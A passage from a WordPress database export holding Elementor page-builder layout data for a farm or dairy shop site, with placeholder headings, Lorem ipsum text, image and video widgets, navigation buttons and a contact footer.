here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}]},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8974,1540,'_elementor_page_assets','a:0:{}'),(8976,1541,'_elementor_edit_mode','builder'),(8977,1541,'_elementor_template_type','wp-page'),(8978,1541,'_elementor_version','3.7.8'),(8979,1541,'_wp_page_template','elementor_canvas'),(8980,1541,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":32.792000000000002},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":9.5269999999999992},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":6.8070000000000004},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":10.93},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.159000000000001},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":12.058999999999999},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1356,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/abstract-background-wheat-farm-wallpaper-51701325.jpg\"}]},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":8.9529999999999994},\"elements\":[],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":91,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":976,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"4b8356a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"0775f80\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"8a4dc1c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5270078\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"6ac0016\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"9200df5\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"-21\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=XHOmBV4js_E\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_u